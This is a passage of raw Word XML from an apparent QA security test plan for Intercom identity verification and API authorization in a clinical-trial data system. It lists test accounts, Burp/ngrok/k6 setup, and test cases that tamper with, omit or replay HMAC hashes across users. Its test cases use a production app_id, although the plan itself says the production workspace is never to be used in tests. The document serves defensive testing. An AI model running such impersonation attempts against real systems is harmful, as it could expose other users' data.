        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="37F0DB5D" w14:textId="77777777"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5EC7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Zero-permission user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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EB95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usr_qa_noperm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8824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qa_noperm@medrio.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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B225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Auth failure tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="53697303" w14:textId="77777777"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C596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CSP Tenant User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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D828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usr_csp_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4656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csp_user@medrio.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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318C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CSP-specific Pendo + Intercom tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F6E1E33" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E89316B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.4 Existing Test Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403993C3" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Conversation IDs: conv_88441 (owned by usr_qa_001), conv_USER_B_55992 (owned by usr_qa_002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE67B06" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Study: Phase3-Oncology-Study | Site: SITE_042 — must exist in QA environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A978E" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Slow OData entity for proxy rate test: minimum 500 subjects in study</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564FE86" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E852FA5" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.5 Tools &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681CC65" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Postman: Import EDC-42201-Intercom.postman_collection.json — set env var INTERCOM_API_TOKEN_EDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B177B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Burp Suite: Set proxy to 127.0.0.1:8080 — intercept *.intercom.io and *.pendo.io traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10ACE4" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> http 3000 — expose local webhook receiver for TC-WH-001 to TC-WH-004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC56D30" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k6: brew install k6 — used for TC-RL-001 rate limit test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA936A" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL: verify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> version → OpenSSL 3.x — used for all HMAC hash generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF64690" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFDE239" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.6 Mocking &amp; Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC6B5E" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Use non-production Intercom workspace (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>app_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>app_edc_qa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>) — never production workspace during tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0FB3A3" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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38631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>HMAC secret for tests: Rotate INTERCOM_IDENTITY_SECRET to known test value before TC-IV-001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B60CA" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Rate limit reset: Wait 60s between TC-RL-001 runs to avoid carry-over throttle state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CE080" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DED7466" w14:textId="2BFE55AC" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 3 — Test Cases</w:t>
      </w:r>
      <w:r w:rsidR="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(26 Total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49976E75" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50" w:after="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t xml:space="preserve">Categories: Identity Verification (4) · API </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>AuthZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4) · Webhook (4) · XSS/Injection (3) · PII Exposure (6) · Rate Limiting (2) · CSP (2) · Regression (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51754CA7" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="6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7"/>
        <w:gridCol w:w="537"/>
        <w:gridCol w:w="942"/>
        <w:gridCol w:w="1728"/>
        <w:gridCol w:w="5225"/>
        <w:gridCol w:w="3282"/>
        <w:gridCol w:w="637"/>
        <w:gridCol w:w="472"/>
        <w:gridCol w:w="698"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2195D1F9" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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A8DD1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lastRenderedPageBreak/>
              <w:t>TC ID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F5B06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Vuln ID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3D5B1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Category</w:t>
            </w:r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998FA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Title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E9912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Exact Request / Action / Payload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310BE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Expected Result (Status + Body + Log Evidence)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6349F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D8B4F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P/F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61D7A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Sev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="26B8C2B8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512A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TC-IV-001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9584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V-01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D4E54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A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Identity </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Verif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r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2A38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Valid HMAC boot accepted for EDC user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7BED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JS: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window.Intercom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('boot', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B32222A" w14:textId="6EAF1AAF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app_id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: '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app_edc_prod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',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D559C18" w14:textId="5BF8A0C9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user_id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: 'usr_qa_001',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685221DA" w14:textId="7E3A69BD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email: 'qa_user@medrio.com',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31E99FEF" w14:textId="2C59BB12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user_hash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: HMAC_SHA256(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA95157" w14:textId="15CAA793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key=INTERCOM_IDENTITY_SECRET,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA25550" w14:textId="2E43EE6F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msg='usr_qa_001')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AAFCEA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})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8C35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HTTP 200 from js.intercom.io/messenger/web</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108B1AF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Widget renders authenticated session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4395D28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Network: no 401/403 from Intercom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B9DD8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Console: 0 Intercom errors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267574F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Log: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identity_verified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=true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5F70A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2E80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CA452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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="39CBB588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2DA1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TC-IV-002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5AEF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V-01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661A6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A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Identity </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Verif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r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CD2F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Tampered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user_hash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rejected — 1-byte flip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5CD9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JS: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window.Intercom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('boot', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F8C9908" w14:textId="6031B2F5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app_id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: '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app_edc_prod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',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD7A1E5" w14:textId="5CE0836F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user_id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: 'usr_qa_001',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6AADCD" w14:textId="3F8AFFCB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user_hash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: '&lt;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valid_hash_with_last_char_changed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&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9A629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})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C63CB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E.g. valid ends in 'a3' → change to 'a4'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4E38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Intercom rejects session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52693C6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Widget does NOT display user data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A3E57F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Network: Intercom returns 403 or unauthenticated state</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C25D5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Console: no PII logged</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F831FE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Log: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identity_verified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=false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AD5B5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5218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2ED70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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="41D52481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0060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TC-IV-003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55D9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V-01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54D03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A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Identity </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Verif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r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86B6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Missing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user_hash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when IV enabled → denied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CCC8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JS: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window.Intercom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('boot', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BFDBF1" w14:textId="26E971E9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app_id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: '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app_edc_prod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',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52659886" w14:textId="4587E7E5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user_id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: 'usr_qa_001',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E991CB5" w14:textId="405C5364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email: 'qa_user@medrio.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72EEFEED" w14:textId="34732F66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//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user_hash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intentionally omitted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B6CC9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})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4D9C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Widget boots in ANONYMOUS mode only</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B3CEA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User context (name/email) NOT pre-filled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0CE12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Network: no authenticated Intercom session created</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2227276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Response body must NOT contain email/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user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F9320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C245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BF9A6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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="12EE6A47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6427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TC-IV-004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1257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V-01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69287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A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Identity </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Verif</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A6B1A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r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0388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Hash computed for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user_A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used against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user_B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→ rejected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4A99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1. Generate: HMAC('usr_qa_001', INTERCOM_IDENTITY_SECRET)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04ABFCC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2. Boot widget with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user_id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='usr_qa_002'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550DF540" w14:textId="68184092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and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user_hash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from step 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13867B9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window.Intercom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('boot', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2940BD9B" w14:textId="0580A410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app_id:'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app_edc_prod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',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B6A40C" w14:textId="547000C7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user_id:'usr_qa_002',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C037CE" w14:textId="4D044F43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user_hash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: &lt;hash_for_usr_qa_001&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69298C5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})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9A96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Intercom returns 403 for mismatched identity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E53B9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Widget does NOT show usr_qa_002's conversations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2B37D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Console: authentication error — no data bleed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1709166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Log: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user_id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mismatch detected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E5B11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8849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3D13A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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2F1B9CE0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FCED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TC-API-001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F6FB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V-03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D963F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7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>AuthZ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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9D5C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Valid token fetches own conversation — 200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A82D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curl -X GET 'https://api.intercom.io/conversations/conv_88441' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD951C2" w14:textId="706A4BF3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-H 'Authorization: Bearer {INTERCOM_API_TOKEN_EDC}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55226467" w14:textId="00A04818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-H 'Accept: application/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json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' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2372B6F6" w14:textId="660C168D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-H 'Intercom-Version: 2.11'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1B24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HTTP 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2781A03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Body: {"type":"conversation","id":"conv_88441"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32EB537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owner matches authenticated user</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08ECE62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No cross-user data present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62051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2751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350B2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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2E765182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DF98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TC-API-002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B1DD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V-03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5955A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7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
